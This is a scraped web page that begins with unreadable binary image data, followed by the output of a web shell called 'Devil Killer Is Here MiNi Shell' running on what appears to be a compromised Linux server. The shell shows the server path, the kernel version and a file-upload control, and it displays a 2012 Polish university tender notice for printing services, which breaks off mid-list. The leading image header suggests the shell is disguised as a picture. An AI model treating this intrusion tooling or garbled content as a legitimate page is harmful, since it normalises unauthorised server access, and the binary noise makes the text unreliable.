JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120207/31413-N-2012.html

<p class="kh_header"><b>Wrocław: AM/AZ/ PN-08/2012</b><br>
<b>Numer ogłoszenia: 31413 - 2012; data zamieszczenia: 07.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Medyczna im. Piastów Śląskich , ul. Pasteura 1, 50-537 Wrocław, woj. dolnośląskie, tel. (071) 784 00 44; 784-11-73, faks (071) 784 00 45.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.am.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> AM/AZ/ PN-08/2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest drukowanie, oprawa i dostawa  niżej wymienionych publikacji opracowywanych  merytorycznie i  typologicznie w Akademii Medycznej we Wrocławiu, oraz podzielonych na zadania określone  jako części.: A, B, C, D,  z których każda  oceniana  jest  oddzielnie. Tym samym Zamawiający dopuszcza składanie ofert częściowych,  na każdy rodzaj publikacji lub na publikacje wybrane przez Wykonawcę. 
Przedstawione poniżej rodzaje i liczby planowanych publikacji określone zostały 
na podstawie realizacji z ostatnich 2 lat, ale Zamawiający zastrzega możliwość 
wprowadzania zmian w granicach ? 20% planowanego zamówienia, w każdej części: A- D
Przedmiot zamówienia podzielony został na następujace części:
A- Rozprawy Habilitacyjne B- Podręczniki w twardej i miękkiej okładce C- Gazeta Uczelniana D- Czasopisma naukowe.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielania zamówień uzupełniających (np. suplementów)o których mowa w art. 67 ust. 1 pkt. 5 Pzp nieobjętych zamówieniem podstawowym i nieprzekraczających łącznie 20 % wartości realizowanego zamówienia, a niezbędnych do jego prawidłowego wykonania, których wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia lub zmniejszenie zamówienia do 20% jeżeli zaistnieje taka potrzeba.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.82.00.00-8, 79.82.30.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złozenia wadium w żadnej części zamówienia PN-08/12 część A - D</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia przez Wykonawcę/ów warunków udziału w postępowaniu będzie dokonana metodą /spełnia/nie spełnia/ w oparciu o informacje zawarte w oświadczeniach i dokumentach, jakich żąda Zamawiający, z zastrzeżeniem wykorzystania przepisu art. 26 ust. 3 i ust. 4 Pzp
O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone  w art. 22 ust. 1 Pzp, dotyczące:
1)	 posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy  
 prawa nakładają obowiązek posiadania takich uprawnień;
2)	 posiadania wiedzy i doświadczenia;
3)	 dysponowania odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania 
             zamówienia 
4)	sytuacji ekonomicznej i finansowej.  

W celu potwierdzenia spełniania niniejszych warunków Wykonawcy zobowiązani są przedłożyć następujące dokumenty :

1) Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy Pzp, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców do oferty muszą być załączone przedmiotowe dokumenty dla każdego z nich
2)Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich).
3) Aktualne zaświadczenia właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

  4).  Informację z Krajowego Rejestru Karnego albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania  ofert, potwierdzającej odpowiednio, że w wypadku Wykonawcy będącego:
-  osobą fizyczną - tej osoby fizycznej;
-  spółką jawną - wspólnika;
-  spółką partnerską - partnera lub członka zarządu;
-  spółką komandytową - komplementariusza;
-  spółką komandytowo-akcyjną - komplementariusza;
- osobą prawną (nie wymienioną powyżej) - urzędującego członka organu zarządzającego nie skazano prawomocnie za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwa przeciwko obrotowi gospodarczemu lub innego przestępstwa popełnionego w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego, wystawionej nie wcześniej niż  6 miesięcy przed upływem terminu składania  ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich).
5)  Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 Pzp, tj. potwierdzającej, że wobec podmiotu zbiorowego sąd nie orzekł zakazu ubiegania się o zamówienia, na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary,  wystawionej nie wcześniej niż  6 miesięcy przed upływem terminu składania  ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich).
 6)  Oświadczenie o spełnianiu warunków udziału w postępowaniu na podstawie art. 44 w zw. z art. 22 ust. 1 pkt 1-4 ustawy z dnia 29.1.2004 r.  Pzp.  Oświadczenie może być złożone przez każdego z Wykonawców składających ofertę wspólną, gdy każdy z nich spełnia wszystkie warunki samodzielnie, albo może być złożone wspólnie i podpisane przez Pełnomocnika  lub przez osoby reprezentujące wszystkich Wykonawców.
7) Jeżeli w przypadku wykonawcy mającego siedzibę na terytorium Rzeczpospolitej Polskiej, osoby, o których mowa w art. 24 ust. 1 pkt. 5-8 ustawy, mają miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, wykonawca składa w odniesieniu do nich zaświadczenie właściwego organu sądowego albo administracyjnego miejsca zamieszkania dotyczące niekaralności tych osób w zakresie określonym w art. 24 ust. 1 pkt. 5-8 ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, z tym że w przypadku gdy w miejscu zamieszkania tych osób nie wydaje się takich zaświadczeń - zstępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego miejsca zamieszkania tych osób

   8) Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium  Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa  pkt.  2 - 5 składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)   nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)  nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c)   nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
d) oraz zamiast dokumentu   pkt. 7 - składa zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy.
 9)  Dokumenty, o których mowa w  pkt.  8a, 8c, 8d  powinny być wystawione nie wcześniej niż   6 miesięcy przed upływem terminu składania ofert, natomiast dokument, o którym mowa   w  pkt. 8b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
10) W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamawiający może zwrócić się do właściwych organów odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.
11) Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia-  z zastrzeżeniem wykorzystania przepisu art. 26 ust. 3 i ust. 4 . Pzp.
13) Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.
14) Gdy oferta zostanie podpisana przez inną osobę/y  niż wymieniona/e  w dokumentach  rejestracyjnych, w wyniku udzielonego pełnomocnictwa, do oferty należy dołączyć pełnomocnictwo udzielone przez osobę (osoby) prawnie upoważnioną do reprezentacji Wykonawcy.

  6.   Spełnienie warunku  pkt. 3.2  Wykonawca udokumentuje poprzez złożenie :      
Wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług druku publikacji w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia w danej części w której Wykonawca składa ofertę, z podaniem ich  nakładu, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te usługi zostały wykonane należycie. 
Wymagane jest przedstawienie min. 3 zamówień na  druk i oprawę  publikacji ISBN, każdej o nakładzie  co najmniej 300 egz.


IV.   WYKAZ OŚWIADCZEŃ I DOKUMENTÓW, SKŁADAJĄCYCH SIĘ NA OFERTĘ
  W POSTĘPOWANIU 
 
Załącznik nr 1 -  Formularz ofertowy zawierający   cennik druku danej   publikacji oraz deklarację terminową wykonania i usuwania zauważonych wad przez Wykonawcę, (deklaracje wpisane zostaną do Umowy, której projekt załączony jest do Siwz).  Wykonawca przedstawi do oceny -   Wzór publikacji, odpowiadający swoim rodzajem przedmiotowi zamówienia w danej części (A- D), w której Wykonawca składa ofertę, wykonany przez Wykonawcę,  celem oceny jakościowej, przez Zamawiającego, zgodnie z przyjętymi kryteriami. Ocena publikacji dotyczy sposobu wykonania druku w tym tabel, oprawy, wysycenia kolorów i trwałości egzemplarza. Dowolny może być format i ilości stron prezentowanego wzoru.
Załącznik nr 2 - Oświadczenie o spełnianiu warunków o których mowa w art. 22 ust. 1 ustawy prawo zamówień publicznych i o nie wykluczeniu Wykonawcy z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1-2 Pzp (wzór przedstawiony w SIWZ); 
Załącznik nr 3 - Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej (w formie czytelnej kserokopii) - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
Załącznik nr 4 - Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
Załącznik nr 5 - Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; 
Załącznik nr 6a -  aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym   
   w art. 24 ust. 1 pkt 4-8 ustawy, i jeżeli dotyczy wykonawcy
Załącznik 6b  w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy,  wystawionych nie wcześniej 
  niż 6 miesięcy przed upływem terminu składania ofert;

Załącznik nr 7  - Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia w danej części w której Wykonawca składa ofertę, z podaniem ich  nakładu, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te usługi zostały wykonane należycie. 
     Wymagane jest przedstawienie min. 3 zamówień na  druk i oprawę  publikacji każdej o nakładzie  co najmniej 300 egz
Załącznik nr 8- Pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów. 

    W przypadku Wykonawców wspólnie ubiegających się o zamówienie (np. spółki cywilne lub konsorcja) dokumenty wymienione  jako załączniki  3, 4, 5, 6a i 6b  powinien dołączyć każdy podmiot występujący wspólnie; pozostałe dokumenty załączniki nr 1,  2, 7, 8 i 9,  których  warunki  mogą spełniać łącznie, winni wspólnie opracować i podpisać (np. przez osoby /ę  upełnomocnione / upełnomocnioną).   
      Jeżeli oferta wykonawców, o których mowa w art.23 ust. 1, została wybrana, zamawiający  zażąda przed  zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych wykonawców,  zawierającą co najmniej: 
-	oświadczenie o solidarnej odpowiedzialności każdego z uczestników konsorcjum/ wspólników,  wobec Zamawiającego
-	zakres odpowiedzialności podmiotów
-	czas trwania Konsorcjum/Umowy wspólników, obejmujący pełny okres realizacji przedmiotu zamówienia
-	wykluczenie możliwości wypowiedzenia umowy Konsorcjum/wspólników przez któregokolwiek z jego członków do czasu wykonania zamówienia,
-	pełnomocnictwo każdego z uczestników Konsorcjum dla Lidera, upoważniające do reprezentowania Konsorcjum w przetargu,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów, na okres korzystania z nich przy wykonaniu zamówienia. 
Spełnienie w/w warunku   Wykonawca udokumentuje poprzez złożenie :      
Wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług druku publikacji w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia w danej części w której Wykonawca składa ofertę, z podaniem ich  nakładu, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te usługi zostały wykonane należycie. 
Wymagane jest przedstawienie min. 3 zamówień na  druk i oprawę  publikacji ISBN, każdej o nakładzie  co najmniej 300 egz.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie Oświadczenia Wykonawcy o spełnianiu warunków o których mowa w art. 22 ust. 1 Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie Oświadczenia Wykonawcy o spełnianiu warunków o których mowa w art. 22 ust. 1 Pzp</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie Oświadczenia Wykonawcy o spełnianiu warunków o których mowa w art. 22 ust. 1 Pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

